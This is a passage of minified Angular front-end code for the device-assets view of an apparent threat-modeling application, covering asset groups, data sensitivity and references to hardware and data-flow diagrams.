as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}th[_ngcontent-%COMP%], td[_ngcontent-%COMP%]{font-size:small}tr[_ngcontent-%COMP%]{height:30px!important}th.mat-header-cell[_ngcontent-%COMP%]:first-of-type, td.mat-cell[_ngcontent-%COMP%]:first-of-type, td.mat-footer-cell[_ngcontent-%COMP%]:first-of-type{padding-left:5px!important}th.mat-header-cell[_ngcontent-%COMP%]:last-of-type, td.mat-cell[_ngcontent-%COMP%]:last-of-type, td.mat-footer-cell[_ngcontent-%COMP%]:last-of-type{padding-right:5px!important}.removed-item[_ngcontent-%COMP%]{opacity:.3}.tools[_ngcontent-%COMP%]{display:block;float:left;height:27px;width:calc(100% - 20px);font-size:12px}.toolBtn[_ngcontent-%COMP%]{width:30px;min-width:30px;padding:0;line-height:25px;margin-left:5px}.toolBtn-Selected[_ngcontent-%COMP%]{background-color:#ffffff26}.filterInput[_ngcontent-%COMP%]{margin-left:5px;width:200px;height:25px}.disable[_ngcontent-%COMP%]{pointer-events:none}"]}),t})();function Jpt(t,a){1&t&&(s(0),oe(1,"translate")),2&t&&ct("\n        ",re(1,1,"pages.modeling.deviceassets.assetview"),"\n      ")}function Zpt(t,a){if(1&t){const e=Ye();m(0,"button",11),he("click",function(){be(e);const n=B().$implicit;return Me(B().DeleteGroup(n))}),oe(1,"translate"),m(2,"mat-icon"),s(3,"delete"),u()()}2&t&&at("matTooltip",re(1,1,"general.Delete"))}function e_t(t,a){if(1&t){const e=Ye();m(0,"button",11),he("click",function(n){be(e);const r=B().$implicit;return Me(B().AddGroup(r,n))}),oe(1,"translate"),m(2,"mat-icon"),s(3,"add"),u()()}2&t&&at("matTooltip",re(1,1,"general.Add"))}function t_t(t,a){if(1&t){const e=Ye();m(0,"button",11),he("click",function(n){be(e);const r=B().$implicit;return Me(B().AddMyData(r,n))}),oe(1,"translate"),m(2,"mat-icon"),s(3,"description"),u()()}2&t&&at("matTooltip",re(1,1,"general.Data"))}function i_t(t,a){if(1&t){const e=Ye();m(0,"button",15),he("click",function(){be(e);const n=B().$implicit;return Me(B(2).DeleteMyData(n))}),oe(1,"translate"),m(2,"mat-icon"),s(3,"delete"),u()()}2&t&&at("matTooltip",re(1,1,"general.Delete"))}function a_t(t,a){if(1&t){const e=Ye();m(0,"div",12),he("click",function(n){const c=be(e).$implicit;return Me(B(2).SelectObject(n,c))})("dragstart",function(n){const c=be(e).$implicit;return Me(B(2).onDrag(n,c))}),s(1,"\n              "),m(2,"mat-icon"),s(3,"description"),u(),m(4,"span",13),s(5),u(),s(6," "),ne(7,i_t,4,3,"button",14),s(8,"\n            "),u()}if(2&t){const e=a.$implicit,i=B(2);Ct("highlight-dark",i.theme.IsDarkMode&&i.selectedObject==e)("highlight-light",!i.theme.IsDarkMode&&i.selectedObject==e),C(5),ke(e.Name),C(2),V("ngIf",!i.hideButtons)}}function n_t(t,a){if(1&t){const e=Ye();m(0,"button",11),he("click",function(){be(e);const n=B().$implicit;return Me(B(3).DeleteGroup(n))}),oe(1,"translate"),m(2,"mat-icon"),s(3,"delete"),u()()}2&t&&at("matTooltip",re(1,1,"general.Delete"))}function o_t(t,a){if(1&t){const e=Ye();m(0,"button",11),he("click",function(n){be(e);const r=B().$implicit;return Me(B(3).AddGroup(r,n))}),oe(1,"translate"),m(2,"mat-icon"),s(3,"add"),u()()}2&t&&at("matTooltip",re(1,1,"general.Add"))}function r_t(t,a){if(1&t){const e=Ye();m(0,"button",11),he("click",function(n){be(e);const r=B().$implicit;return Me(B(3).AddMyData(r,n))}),oe(1,"translate"),m(2,"mat-icon"),s(3,"description"),u()()}2&t&&at("matTooltip",re(1,1,"general.Data"))}function s_t(t,a){if(1&t){const e=Ye();m(0,"button",15),he("click",function(){be(e);const n=B().$implicit;return Me(B(4).DeleteMyData(n))}),oe(1,"translate"),m(2,"mat-icon"),s(3,"delete"),u()()}2&t&&at("matTooltip",re(1,1,"general.Delete"))}function c_t(t,a){if(1&t){const e=Ye();m(0,"div",12),he("click",function(n){const c=be(e).$implicit;return Me(B(4).SelectObject(n,c))})("dragstart",function(n){const c=be(e).$implicit;return Me(B(4).onDrag(n,c))}),s(1,"\n                    "),m(2,"mat-icon"),s(3,"description"),u(),m(4,"span",13),s(5),u(),s(6," "),ne(7,s_t,4,3,"button",14),s(8,"\n                  "),u()}if(2&t){const e=a.$implicit,i=B(4);Ct("highlight-dark",i.theme.IsDarkMode&&i.selectedObject==e)("highlight-light",!i.theme.IsDarkMode&&i.selectedObject==e),C(5),ke(e.Name),C(2),V("ngIf",!i.hideButtons)}}const l_t=function(t){return{$implicit:t,colCnt:1}};function d_t(t,a){if(1&t&&it(0,"div",20),2&t){const e=a.$implicit;B(4),V("ngTemplateOutlet",Ti(9))("ngTemplateOutletContext",fr(2,l_t,e))}}function m_t(t,a){if(1&t){const e=Ye();m(0,"div",5),he("click",function(n){const c=be(e).$implicit;return Me(B(3).SelectObject(n,c))}),s(1,"\n                  "),m(2,"div",6),he("dragstart",function(n){const c=be(e).$implicit;return Me(B(3).onDrag(n,c))})("drop",function(n){const c=be(e).$implicit;return Me(B(3).onDrop(n,c))})("dragover",function(n){return be(e),Me(B(3).onAllowDrop(n))}),s(3,"\n                    "),m(4,"span"),s(5),u(),s(6,"\n                    "),ne(7,n_t,4,3,"button",7),s(8,"\n                    "),ne(9,o_t,4,3,"button",7),s(10,"\n                    "),ne(11,r_t,4,3,"button",7),s(12,"\n                  "),u(),s(13,"\n                  "),ne(14,c_t,9,6,"div",8),s(15,"\n                  "),m(16,"div",18),s(17,"\n                    "),ne(18,d_t,1,4,"div",19),s(19,"\n                  "),u(),s(20,"\n                "),u()}if(2&t){const e=a.$implicit,i=B(2).isFirst,n=B();ri("margin-left",i?"0px":"20px"),Ct("disableAsset",!e.IsActive)("highlight-dark",n.theme.IsDarkMode&&n.selectedObject==e)("highlight-light",!n.theme.IsDarkMode&&n.selectedObject==e),C(5),ke(e.Name),C(2),V("ngIf",!n.hideButtons),C(2),V("ngIf",!n.hideButtons),C(2),V("ngIf",!n.hideButtons),C(3),V("ngForOf",e.AssociatedData),C(4),V("ngForOf",e.SubGroups)}}function u_t(t,a){if(1&t&&(m(0,"div",16),s(1,"\n                "),ne(2,m_t,21,14,"div",17),s(3,"\n              "),u()),2&t){const e=a.index,i=B(),n=i.colCnt,r=i.$implicit,c=B();ri("width",(100/n).toString()+"%"),C(2),V("ngForOf",c.GetArrayRange(r.SubGroups,e,n))}}function h_t(t,a){if(1&t){const e=Ye();s(0,"\n        "),m(1,"div",5),he("click",function(n){const c=be(e).$implicit;return Me(B().SelectObject(n,c))}),s(2,"\n          "),m(3,"div",6),he("dragstart",function(n){const c=be(e).$implicit;return Me(B().onDrag(n,c))})("drop",function(n){const c=be(e).$implicit;return Me(B().onDrop(n,c))})("dragover",function(n){return be(e),Me(B().onAllowDrop(n))}),s(4,"\n            "),m(5,"span"),s(6),u(),s(7,"\n            "),ne(8,Zpt,4,3,"button",7),s(9,"\n            "),ne(10,e_t,4,3,"button",7),s(11,"\n            "),ne(12,t_t,4,3,"button",7),s(13,"\n          "),u(),s(14,"\n          "),m(15,"div"),s(16,"\n            "),ne(17,a_t,9,6,"div",8),s(18,"\n          "),u(),s(19,"\n          "),m(20,"div"),s(21,"\n            "),m(22,"div",9),s(23,"\n              "),ne(24,u_t,4,3,"div",10),s(25,"\n            "),u(),s(26,"\n          "),u(),s(27,"\n        "),u(),s(28,"\n      ")}if(2&t){const e=a.$implicit,i=a.colCnt,n=a.isFirst,r=B();C(1),Ct("disableAsset",!e.IsActive)("highlight-dark",r.theme.IsDarkMode&&r.selectedObject==e)("highlight-light",!r.theme.IsDarkMode&&r.selectedObject==e),C(2),ri("text-align",n?"center":"left")("height",n?"40px":"auto"),C(2),ri("font-weight",n?"bold":"normal"),C(1),ke(e.Name),C(2),V("ngIf",!r.hideButtons),C(2),V("ngIf",!r.hideButtons),C(2),V("ngIf",!r.hideButtons),C(5),V("ngForOf",e.AssociatedData),C(7),V("ngForOf",r.GetColArray(i))}}function f_t(t,a){1&t&&(m(0,"div",35),s(1,"\xa0"),u()),2&t&&ri("min-width",B(3).GetGapWidth())}function p_t(t,a){1&t&&(bt(0),s(1,"\xa0"),Mt())}function __t(t,a){if(1&t){const e=Ye();m(0,"button",11),he("click",function(n){be(e);const r=B(4);return Me(r.AddGroup(r.assetGroup,n))}),oe(1,"translate"),m(2,"mat-icon"),s(3,"add"),u()()}2&t&&at("matTooltip",re(1,1,"general.Add"))}function g_t(t,a){if(1&t&&(bt(0),ne(1,__t,4,3,"button",7),Mt()),2&t){const e=B(3);C(1),V("ngIf",!e.hideButtons)}}const C_t=function(t){return{$implicit:t,isFirst:!0,colCnt:1}};function y_t(t,a){if(1&t&&(bt(0),s(1,"\n              "),ne(2,f_t,2,2,"div",31),s(3,"\n              "),m(4,"div",32),s(5,"\n                "),m(6,"div",33),s(7,"\n                  "),Ir(8,20),s(9,"\n                "),u(),s(10,"\n              "),u(),s(11,"\n              "),m(12,"div",34),s(13,"\n                "),ne(14,p_t,2,0,"ng-container",30),s(15,"\n                "),ne(16,g_t,2,1,"ng-container",30),s(17,"\n              "),u(),s(18,"\n            "),Mt()),2&t){const e=a.$implicit,i=a.first,n=a.last,r=B(2),c=Ti(9);C(2),V("ngIf",i),C(2),ri("width",r.GetColumnWidth())("background-color",r.theme.IsDarkMode?r.bgColorDark:r.bgColorLight),Ct("disableAsset",!e.IsActive),C(4),V("ngTemplateOutlet",c)("ngTemplateOutletContext",fr(13,C_t,e)),C(4),ri("width",r.GetGapWidth()),C(2),V("ngIf",!n),C(2),V("ngIf",n)}}function b_t(t,a){if(1&t){const e=Ye();m(0,"button",11),he("click",function(n){be(e);const r=B(3);return Me(r.AddGroup(r.assetGroup,n))}),oe(1,"translate"),m(2,"mat-icon"),s(3,"add"),u()()}2&t&&at("matTooltip",re(1,1,"general.Add"))}function M_t(t,a){if(1&t&&(m(0,"div",36),s(1,"\n              "),ne(2,b_t,4,3,"button",7),s(3,"\n            "),u()),2&t){const e=B(2);C(2),V("ngIf",!e.hideButtons)}}const v_t=function(t){return{$implicit:t,isFirst:!0,colCnt:3}};function A_t(t,a){if(1&t&&(bt(0),s(1,"\n                "),m(2,"div",33),s(3,"\n                  "),Ir(4,20),s(5,"\n                "),u(),s(6,"\n              "),Mt()),2&t){const e=B(2),i=Ti(9);C(4),V("ngTemplateOutlet",i)("ngTemplateOutletContext",fr(2,v_t,e.assetGroupBase))}}function T_t(t,a){if(1&t&&(s(0,"\n        "),m(1,"div",21),s(2,"\n          "),m(3,"div",22),s(4,"\n            "),fi(),m(5,"svg",23),s(6,"\n              "),it(7,"path",24),s(8," \n            "),u(),s(9,"\n          "),u(),s(10,"\n          "),ln(),m(11,"div",25),s(12,"\n            "),ne(13,y_t,19,15,"ng-container",26),s(14,"\n            "),ne(15,M_t,4,1,"div",27),s(16,"\n          "),u(),s(17,"\n          "),m(18,"div",28),s(19,"\n            "),m(20,"div",29),s(21,"\n              "),ne(22,A_t,7,4,"ng-container",30),s(23,"\n            "),u(),s(24,"\n          "),u(),s(25,"\n        "),u(),s(26,"\n      ")),2&t){const e=B();C(7),Rt("fill",e.theme.IsDarkMode?e.bgColorDark:e.bgColorLight),C(6),V("ngForOf",e.assetGroupsCols),C(2),V("ngIf",0==e.assetGroupsCols.length),C(5),ri("background-color",e.theme.IsDarkMode?e.bgColorDark:e.bgColorLight),C(2),V("ngIf",e.assetGroupBase)}}function E_t(t,a){1&t&&(s(0),oe(1,"translate")),2&t&&ct("\n        ",re(1,1,"pages.modeling.deviceassets.assettree"),"\n      ")}function D_t(t,a){if(1&t){const e=Ye();s(0,"\n        "),m(1,"as-split",37),he("dragEnd",function(n){return be(e),Me(B().OnSplitSizeChange(n,0))}),s(2,"\n          "),m(3,"as-split-area",38),s(4,"\n            "),m(5,"app-nav-tree",39,40),he("selectedNodeChanged",function(n){return be(e),Me(B().selectedNode=n)}),u(),s(7,"\n          "),u(),s(8,"\n          "),m(9,"as-split-area",38),s(10,"\n            "),m(11,"app-assets",41),he("nodeTreeChanged",function(n){return be(e),Me(B().SetNavTreeData(n))}),u(),s(12,"\n          "),u(),s(13,"\n        "),u(),s(14,"\n      ")}if(2&t){const e=B();C(1),V("gutterSize",3)("restrictMove",!0),C(2),Ct("splitter-light2",!e.theme.IsDarkMode)("splitter-dark2",e.theme.IsDarkMode),V("size",e.GetSplitSize(0,0,350))("order",1),C(2),V("activeNode",e.selectedNode),C(4),Ct("bg-color-light3",!e.theme.IsDarkMode)("bg-color-dark3",e.theme.IsDarkMode),V("size",e.GetSplitSize(0,1,"*"))("order",2),C(2),V("isProject",!0)("assetGroup",e.assetGroup)("selectedNode",e.selectedNode)}}function x_t(t,a){1&t&&(s(0),oe(1,"translate")),2&t&&ct("\n        ",re(1,1,"pages.modeling.deviceassets.datalist"),"\n      ")}function w_t(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",51),he("click",function(){const r=be(e).$implicit;return Me(B(2).selectedMyData=r)}),s(1,"\n                "),m(2,"mat-icon",52),s(3,"arrow_right"),u(),s(4,"\n                "),m(5,"div",53),s(6),u(),s(7,"\n                "),m(8,"div",53),s(9),oe(10,"translate"),oe(11,"translate"),u(),s(12,"\n                "),m(13,"button",54),he("click",function(){const r=be(e).$implicit;return Me(B(2).DeleteMyData(r))}),oe(14,"translate"),m(15,"mat-icon"),s(16,"delete"),u()(),s(17,"\n              "),u()}if(2&t){const e=a.$implicit,i=B(2);Ct("highlight-light",i.selectedMyData===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedMyData===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(6),ke(e.GetLongName()),C(3),za("",re(10,9,"properties.Sensitivity"),": ",re(11,11,i.GetSensitivity(e.Sensitivity)),""),C(4),at("matTooltip",re(14,13,"general.Delete"))}}function I_t(t,a){if(1&t&&(bt(0),s(1,"\n              "),m(2,"div",55),s(3,"\n                "),it(4,"app-mydata",56),s(5,"\n              "),u(),s(6,"\n            "),Mt()),2&t){const e=B(2);C(4),V("myData",e.selectedMyData)("showAssetGroup",!0)}}function R_t(t,a){if(1&t){const e=Ye();s(0,"\n        "),m(1,"div",9),s(2,"\n          "),m(3,"div",42),s(4,"\n            "),m(5,"mat-list",43),s(6,"\n              "),m(7,"div",44),s(8),oe(9,"translate"),m(10,"button",45),he("click",function(n){be(e);const r=B();return Me(r.AddMyData(r.assetGroup,n))}),oe(11,"translate"),m(12,"mat-icon"),s(13,"add"),u()(),s(14,"\n                "),m(15,"button",46),oe(16,"translate"),m(17,"mat-icon"),s(18,"more_vert"),u()(),s(19,"\n                "),m(20,"mat-menu",null,47),s(22,"\n                  "),m(23,"button",48),he("click",function(){return be(e),Me(B().ResetNumbers())}),s(24),oe(25,"translate"),u(),s(26,"\n                "),u(),s(27,"\n              "),u(),s(28,"\n              "),ne(29,w_t,18,15,"mat-list-item",49),s(30,"\n            "),u(),s(31,"\n          "),u(),s(32,"\n          "),m(33,"div",50),s(34,"\n            "),ne(35,I_t,7,2,"ng-container",30),s(36,"\n          "),u(),s(37,"\n        "),u(),s(38,"\n      ")}if(2&t){const e=Ti(21),i=B();C(5),Ct("prop-list-light",!i.theme.IsDarkMode)("prop-list-dark",i.theme.IsDarkMode),C(3),ct("",re(9,12,"general.Datas")," \n                "),C(2),at("matTooltip",re(11,14,"general.Add")),C(5),at("matTooltip",re(16,16,"general.More")),V("matMenuTriggerFor",e),C(8),V("disabled",i.assetGroup.GetMyDataFlat().length<2),C(1),ke(re(25,18,"pages.modeling.threattable.resetNumbers")),C(5),V("ngForOf",i.assetGroup.GetMyDataFlat()),C(6),V("ngIf",i.assetGroup.GetMyDataFlat().includes(i.selectedMyData))}}function S_t(t,a){1&t&&(s(0),oe(1,"translate")),2&t&&ct("\n        ",re(1,1,"pages.modeling.deviceassets.referencematrix"),"\n      ")}function k_t(t,a){if(1&t){const e=Ye();m(0,"th",59),s(1,"\n                  "),m(2,"button",61),he("click",function(){const r=be(e).$implicit;return Me(B(2).OpenDiagram(r))}),oe(3,"translate"),s(4),u(),s(5,"\n                "),u()}if(2&t){const e=a.$implicit,i=B(2);ri("border-color",i.theme.IsDarkMode?i.bgColorDark:i.bgColorLight),C(2),$c("matTooltip","",re(3,5,"pages.modeling.deviceassets.OpenDiagram"),": ",e.Name,""),C(2),ke(e.Name)}}function P_t(t,a){if(1&t){const e=Ye();m(0,"th",59),s(1,"\n                  "),m(2,"button",61),he("click",function(){const r=be(e).$implicit;return Me(B(2).OpenDiagram(r))}),oe(3,"translate"),s(4),u(),s(5,"\n                "),u()}if(2&t){const e=a.$implicit,i=B(2);ri("border-color",i.theme.IsDarkMode?i.bgColorDark:i.bgColorLight),C(2),$c("matTooltip","",re(3,5,"pages.modeling.deviceassets.OpenDiagram"),": ",e.Name,""),C(2),ke(e.Name)}}function O_t(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                    "),m(2,"button",63),he("click",function(){const r=be(e).$implicit,c=B().$implicit;return Me(B(3).OpenElement(c,r))}),oe(3,"translate"),s(4),u(),s(5,"\n                    "),it(6,"br"),s(7,"\n                  "),Mt()}if(2&t){const e=a.$implicit;C(2),$c("matTooltip","",re(3,3,"pages.modeling.deviceassets.OpenElement"),": ",e.Name,""),C(2),ke(e.Name)}}function N_t(t,a){if(1&t&&(m(0,"td",59),s(1,"\n                  "),ne(2,O_t,8,5,"ng-container",26),s(3,"\n                "),u()),2&t){const e=a.$implicit,i=B().$implicit,n=B(2);ri("border-color",n.theme.IsDarkMode?n.bgColorDark:n.bgColorLight),C(2),V("ngForOf",n.GetReferences(i,e))}}function L_t(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                    "),m(2,"button",63),he("click",function(){const r=be(e).$implicit,c=B().$implicit;return Me(B(3).OpenElement(c,r))}),oe(3,"translate"),s(4),u(),s(5,"\n                    "),it(6,"br"),s(7,"\n                  "),Mt()}if(2&t){const e=a.$implicit;C(2),$c("matTooltip","",re(3,3,"pages.modeling.deviceassets.OpenElement"),": ",e.Name,""),C(2),ke(e.Name)}}function z_t(t,a){if(1&t&&(m(0,"td",59),s(1,"\n                  "),ne(2,L_t,8,5,"ng-container",26),s(3,"\n                "),u()),2&t){const e=a.$implicit,i=B().$implicit,n=B(2);ri("border-color",n.theme.IsDarkMode?n.bgColorDark:n.bgColorLight),C(2),V("ngForOf",n.GetReferences(i,e))}}function W_t(t,a){if(1&t&&(m(0,"tr"),s(1,"\n                "),m(2,"td")(3,"span",62),s(4),u()(),s(5,"\n                "),ne(6,N_t,4,3,"td",60),s(7,"\n                "),it(8,"td"),s(9,"\n                "),ne(10,z_t,4,3,"td",60),s(11,"\n              "),u()),2&t){const e=a.$implicit,i=B(2);C(2),ri("border-color",i.theme.IsDarkMode?i.bgColorDark:i.bgColorLight),C(1),at("matTooltip",i.GetAssetToolTip(e)),V("matBadgeHidden",!i.GetAssetToolTip(e)),C(1),ke(e.Name),C(2),V("ngForOf",i.dataService.Project.GetHWDiagrams()),C(2),ri("border-color",i.theme.IsDarkMode?i.bgColorDark:i.bgColorLight),C(2),V("ngForOf",i.dataService.Project.GetDFDiagrams())}}function F_t(t,a){if(1&t&&(s(0,"\n        "),m(1,"div",57),s(2,"\n          "),m(3,"table"),s(4,"\n            "),m(5,"thead"),s(6,"\n              "),m(7,"tr"),s(8,"\n                "),it(9,"th"),s(10,"\n                "),m(11,"th"),s(12),oe(13,"translate"),u(),s(14,"\n                "),it(15,"th",58),s(16,"\n                "),m(17,"th"),s(18),oe(19,"translate"),u(),s(20,"\n              "),u(),s(21,"\n              "),m(22,"tr"),s(23,"\n                "),m(24,"th",59),s(25),oe(26,"translate"),u(),s(27,"\n                "),ne(28,k_t,6,7,"th",60),s(29,"\n                "),it(30,"th"),s(31,"\n                "),ne(32,P_t,6,7,"th",60),s(33,"\n              "),u(),s(34,"\n            "),u(),s(35,"\n            "),m(36,"tbody"),s(37,"\n              "),ne(38,W_t,12,9,"tr",26),s(39,"\n            "),u(),s(40,"\n          "),u(),s(41,"\n        "),u(),s(42,"\n      ")),2&t){const e=B();C(9),ri("border-color",e.theme.IsDarkMode?e.bgColorDark:e.bgColorLight),C(2),ri("border-color",e.theme.IsDarkMode?e.bgColorDark:e.bgColorLight),Rt("colspan",e.dataService.Project.GetHWDiagrams().length),C(1),ke(re(13,20,"pages.modeling.deviceassets.HWDiagram")),C(3),ri("border-color",e.theme.IsDarkMode?e.bgColorDark:e.bgColorLight),C(2),ri("border-color",e.theme.IsDarkMode?e.bgColorDark:e.bgColorLight),Rt("colspan",e.dataService.Project.GetDFDiagrams().length),C(1),ke(re(19,22,"pages.modeling.deviceassets.DFDiagram")),C(6),ri("border-color",e.theme.IsDarkMode?e.bgColorDark:e.bgColorLight),C(1),ke(re(26,24,"pages.modeling.deviceassets.dataDiagrams")),C(3),V("ngForOf",e.dataService.Project.GetHWDiagrams()),C(2),ri("border-color",e.theme.IsDarkMode?e.bgColorDark:e.bgColorLight),C(2),V("ngForOf",e.dataService.Project.GetDFDiagrams()),C(6),V("ngForOf",e.assetGroup.GetMyDataFlat())}}let IZ=(()=>{class t{constructor(e,i,n,r,c,d,T,k){this.theme=e,this.dataService=i,this.locStorage=n,this.dialog=r,this.elRef=c,this.translate=d,this.router=T,this.activatedRoute=k,this.selectedMyData=null,this.hideButtons=!1,this.selectionChanged=new Tt,this.bgColorDark="#424242",this.bgColorLight="#e7e5e5",this.newGroupDict={},this.colArray=[],this.references={}}get selectedNode(){return this._selectedNode}set selectedNode(e){this._selectedNode=e}SetNavTreeData(e){this.navTree.SetNavTreeData(e)}get selectedObject(){return this._selectedObject}set selectedObject(e){this._selectedObject=e}get assetGroupBase(){return 0==this.assetGroup.SubGroups.length?null:this.assetGroup.SubGroups[0]}get assetGroupsCols(){return this.assetGroup.SubGroups.length<=1?[]:this.assetGroup.SubGroups.slice(1)}ngOnInit(){}SelectObject(e,i){null==e||e.stopPropagation(),this.selectionChanged.emit(i)}AddGroup(e,i){var n;let r;r=e.IsProjectAsset?this.dataService.Project.CreateAssetGroup(e):this.dataService.Config.CreateAssetGroup(e),null===(n=e.ImpactCats)||void 0===n||n.forEach(c=>r.ImpactCats.push(c)),this.SelectObject(i,r),setTimeout(()=>{document.dispatchEvent(new KeyboardEvent("keydown",{key:"F2"}))},250)}DeleteGroup(e){this.dialog.OpenDeleteObjectDialog(e).subscribe(i=>{i&&(this.selectedObject==e&&this.SelectObject(null,null),e.IsProjectAsset?this.dataService.Project.DeleteAssetGroup(e):this.dataService.Config.DeleteAssetGroup(e))})}IsNewAssetGroup(e){return e.ID in this.newGroupDict||(this.newGroupDict[e.ID]=null==this.dataService.Config.AssetGroups.GetGroupsFlat().find(i=>{var n,r;return i.Name==e.Name&&null!=i.Parent&&(null===(n=i.Parent)||void 0===n?void 0:n.Name)==(null===(r=e.Parent)||void 0===r?void 0:r.Name)})),this.newGroupDict[e.ID]}GetColArray(e){return e!=this.colArray.length&&(this.colArray=Array(e).fill(0).map((i,n)=>n)),this.colArray}GetArrayRange(e,i,n){if(e.length>0&&n>1){const r=Math.round(e.length/n);return i==n-1?e.slice(r*i):e.slice(r*i,r*(i+1))}return e}GetColumnWidth(){return(100/(1.2*this.assetGroupsCols.length+.2)).toString()+"%"}GetGapWidth(){return(.2*Number(this.GetColumnWidth().replace("%",""))).toString()+"%"}DeleteMyData(e){this.dataService.Project.DeleteMyData(e),this.selectedMyData==e&&(this.selectedMyData=null),this.selectedObject==e&&this.SelectObject(null,null)}AddMyData(e,i){var n;let r=this.dataService.Project.CreateMyData(e);null===(n=e.ImpactCats)||void 0===n||n.forEach(c=>r.ImpactCats.push(c)),this.selectedMyData=r,this.SelectObject(i,r),setTimeout(()=>{document.dispatchEvent(new KeyboardEvent("keydown",{key:"F2"}))},250)}ResetNumbers(){let e=1;const i=n=>{n.IsNewAsset&&(n.Number=(e++).toString()),n.AssociatedData.forEach(r=>{r.IsNewAsset&&(r.Number=(e++).toString())}),n.SubGroups.forEach(r=>i(r))};i(this.assetGroup)}GetSensitivity(e){return An.ToString(e)}GetSensitivities(){return An.GetKeys()}GetReferences(e,i){return(!this.references[e.ID]||!this.references[e.ID][i.ID])&&(this.references[e.ID]||(this.references[e.ID]={}),this.references[e.ID][i.ID]=i.Elements.GetChildrenFlat().filter(n=>{var r;let c=null===(r=n.GetProperty("ProcessedData"))||void 0===r?void 0:r.includes(e);return c&&n instanceof os&&(c=n.OverwriteDataProperties),c})),this.references[e.ID][i.ID]}GetAssetToolTip(e){const i=this.dataService.Project.GetHWDiagrams().some(c=>{var d;return(null===(d=this.GetReferences(e,c))||void 0===d?void 0:d.length)>0}),n=this.dataService.Project.GetDFDiagrams().some(c=>{var d;return(null===(d=this.GetReferences(e,c))||void 0===d?void 0:d.length)>0});let r="";return i||n?i?n||(r+=this.translate.instant("pages.modeling.deviceassets.noReferenceInDF")):r+=this.translate.instant("pages.modeling.deviceassets.noReferenceInHW"):r=this.translate.instant("pages.modeling.deviceassets.noReferenceInDFHW"),""==r?null:r}OpenDiagram(e){this.router.navigate([],{relativeTo:this.activatedRoute,queryParams:{viewID:e.ID},replaceUrl:!0})}OpenElement(e,i){this.router.navigate([],{relativeTo:this.activatedRoute,queryParams:{viewID:e.ID,elementID:i.ID},replaceUrl:!0})}onAllowDrop(e){e.preventDefault()}onDrag(e,i){e.dataTransfer.setData("ID",i.ID),i instanceof Pu?e.dataTransfer.setData("type","MyData"):i instanceof Zl&&e.dataTransfer.setData("type","AssetGroup")}onDrop(e,i){if(e.preventDefault(),"MyData"==e.dataTransfer.getData("type")){const n=this.dataService.Project.GetMyData(e.dataTransfer.getData("ID"));n.FindAssetGroup().RemoveMyData(n),i.AddMyData(n)}else if("AssetGroup"==e.dataTransfer.getData("type")){const n=this.dataService.Project.GetAssetGroup(e.dataTransfer.getData("ID"));n.GetGroupsFlat().includes(i)||(n.Parent.RemoveAssetGroup(n),i.AddAssetGroup(n))}}GetSelectedTabIndex(){let e=this.locStorage.Get(si.PAGE_MODELING_ASSETS_TAB_INDEX);return null!=e?e:0}SetSelectedTabIndex(e){this.selectedNode=null,this.SelectObject(null,null),this.locStorage.Set(si.PAGE_MODELING_ASSETS_TAB_INDEX,e)}GetSplitSize(e,i,n){let r=this.locStorage.Get(si.PAGE_MODELING_ASSETS_SPLIT_SIZE_X+e.toString());return null!=r?Number(JSON.parse(r)[i]):n}OnSplitSizeChange(e,i){this.locStorage.Set(si.PAGE_MODELING_ASSETS_SPLIT_SIZE_X+i.toString(),JSON.stringify(e.sizes))}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(_r),Ee(Wn),Ee(mi),Ee(Sn),Ee(Oo),Ee(El))},t.\u0275cmp=Wt({type:t,selectors:[["app-device-assets"]],viewQuery:function(e,i){if(1&e&&Mi(df,5),2&e){let n;Vt(n=Bt())&&(i.navTree=n.first)}},inputs:{assetGroup:"assetGroup",hideButtons:"hideButtons",selectedObject:"selectedObject"},outputs:{selectionChanged:"selectionChanged"},decls:36,vars:1,consts:[[2,"width","100%","height","100%"],[1,"tabGroup",2,"height","100%",3,"selectedIndex","selectedIndexChange"],["mat-tab-label",""],["assetGroupTemplate",""],["matTabContent",""],[3,"click"],["draggable","true",1,"draggable",3,"dragstart","drop","dragover"],["mat-icon-button","","class","assetButton","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["style","margin-left: 20px;","class","draggable","draggable","true",3,"highlight-dark","highlight-light","click","dragstart",4,"ngFor","ngForOf"],[1,"row"],["style","float: left;",3,"width",4,"ngFor","ngForOf"],["mat-icon-button","","matTooltipShowDelay","1000",1,"assetButton",3,"matTooltip","click"],["draggable","true",1,"draggable",2,"margin-left","20px",3,"click","dragstart"],[2,"vertical-align","super"],["mat-icon-button","","class","assetButton","style","vertical-align: super;","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["mat-icon-button","","matTooltipShowDelay","1000",1,"assetButton",2,"vertical-align","super",3,"matTooltip","click"],[2,"float","left"],[3,"disableAsset","marginLeft","highlight-dark","highlight-light","click",4,"ngFor","ngForOf"],[2,"margin-left","20px"],[3,"ngTemplateOutlet","ngTemplateOutletContext",4,"ngFor","ngForOf"],[3,"ngTemplateOutlet","ngTemplateOutletContext"],[2,"margin","5px","height","calc(100% - 10px)","font-size","small"],[2,"height","100px"],["height","100%","width","100%","viewBox","0 0 100 100","preserveAspectRatio","none"],["d","M50,0 L100,70 L100,100 L0,100 L0,70 Z"],[2,"min-height","200px","overflow","hidden","display","flex","margin-top","5px"],[4,"ngFor","ngForOf"],["style","width: 100%; display: flex; justify-content: center; align-items: center;",4,"ngIf"],[2,"min-height","100px","overflow","hidden"],[1,"assetColumn",2,"width","100%","margin-top","5px","margin-bottom","5px"],[4,"ngIf"],["style","display: block; float: 